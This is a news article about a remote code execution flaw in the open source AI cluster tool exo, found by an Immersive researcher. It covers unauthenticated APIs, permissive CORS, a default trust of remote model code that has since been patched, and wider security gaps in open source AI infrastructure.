Unauthenticated RCE in exo Raises Alarms About Security in Open Source AI Infrastructure

Mar 4
4 min read

The rapid rise of AI-assisted software development has reshaped how developers build applications. But as the ecosystem around large language models expands, security researchers are warning that some of the tools powering this new generation of development may be moving faster than their security architecture can keep up.

New research from Immersive highlights a remote code execution vulnerability in the open source AI orchestration platform exo, a tool designed to distribute large language model workloads across multiple machines. The issue reveals a broader challenge emerging across the fast growing ecosystem of open source AI infrastructure: platforms built to accelerate experimentation often lack hardened security controls.

Kevin Breen, Senior Director of Cyber Threat Research at Immersive, says the discovery reflects a deeper problem within the rapidly evolving AI development landscape.

“Rushed and Vibe Coded ‘just ship it’ style code is making its way into the ecosystem, and it doesn't have the same level of code review,” Breen wrote in his analysis. “In some cases, we see people with no developer experience, unfamiliar with code lifecycles, vibe coding applications without the concept of security or code review.”

The Rise of AI Development Platforms

Large language models have become deeply embedded in the modern developer workflow. Engineers now routinely rely on AI tools to write, review, and debug code. These models can be accessed through cloud services such as Claude, Gemini, or OpenAI systems, or they can be deployed locally using self hosted models.

Both approaches come with tradeoffs.

Cloud based models provide high performance and easy integration but require organizations to send proprietary code and internal data to external platforms. Running models locally gives developers full control over their data but requires powerful hardware and more complex infrastructure.

As a result, a growing number of developers are turning to open source orchestration tools that manage local AI clusters. Platforms like exo allow multiple machines to work together to run large models that would otherwise require expensive enterprise hardware.

But this rapid adoption has also created a new category of infrastructure that often lacks the mature security controls seen in traditional enterprise software.

A Cluster With No Authentication

The vulnerability uncovered by Breen begins with a design choice that prioritizes ease of setup over security.

exo allows nodes to automatically discover each other and form clusters without requiring authentication or configuration. While convenient for experimentation, the default setup exposes APIs that can be accessed by any device on the same network.

During testing, Breen deployed a simple cluster consisting of three Ubuntu virtual machines. The system came online quickly and the nodes connected automatically.

The problem was that the cluster exposed its API on all network interfaces without authentication or access restrictions.

This meant that any system on the same network could interact with the platform’s management endpoints.

The issue is compounded by the platform’s permissive cross origin resource sharing configuration, which allows any website to send requests to the API.

Turning a Model Into an Attack Vector

The most serious risk appears when users add new AI models to the cluster.

exo allows developers to specify models hosted on Hugging Face repositories. The platform automatically downloads and loads the model along with any supporting files needed to run it.

Inside the code responsible for loading these models, Breen discovered that the system enables a Hugging Face feature that allows models to include custom Python code that runs during initialization.

Normally this feature requires user approval because executing remote code from model repositories can be dangerous.

In exo, however, the option is enabled by default.

“TRUST_REMOTE_CODE” is hard coded to true, meaning that any model loaded from a repository can execute arbitrary code during initialization.

This effectively turns the model loading process into a potential execution path for malicious code.

Exploiting the Weakness

To demonstrate the risk, Breen created a malicious model hosted on Hugging Face that contained a small piece of Python code designed to run when the model was loaded.

Once the model was published, triggering the exploit required only two API calls.

The first request instructs the cluster to download the model from the repository. The second request deploys the model instance to the cluster.

When the model initializes, the malicious code executes on the host system.

In the proof of concept demonstration, the payload simply wrote a file to a temporary directory to prove that execution had occurred. In a real attack scenario, the payload could perform far more damaging actions.

Because the cluster exposes its API on the local network, attackers with network access could trigger the exploit directly. Another scenario involves malicious web pages that use browser requests to interact with the API, allowing attackers to exploit the cluster if a user visits a specially crafted site.

The Security Gap in Open Source AI

While the vulnerability itself may not be widely exploitable across the public internet, researchers say it highlights a systemic issue across the rapidly growing ecosystem of open source AI tools.

Small projects that suddenly gain popularity can attract thousands of users before their codebase undergoes serious security scrutiny.

AI orchestration platforms are particularly sensitive because they often control systems with powerful GPUs, large datasets, and automation capabilities.

As organizations experiment with self hosted AI infrastructure, these platforms may end up inside corporate networks or research environments where a compromise could expose valuable intellectual property.

Patches Released But Risks Remain

The developers behind exo responded quickly after being notified and released a patch that removes the default remote code trust behavior.

However, other security concerns remain.

The platform still lacks authentication controls and continues to allow unrestricted cross origin API access. Security researchers recommend isolating AI clusters on dedicated networks and monitoring logs to detect unexpected models being loaded into the system.

Breen credited the development team for responding quickly to the report and issuing updates.

Even so, the discovery illustrates a larger trend.

As AI tools become easier to build and distribute, the software supply chain around them is expanding rapidly. Without stronger security practices and code review processes, vulnerabilities in these platforms could become an increasingly attractive target for attackers.

In the race to build the infrastructure behind the AI revolution, security may be struggling to keep pace.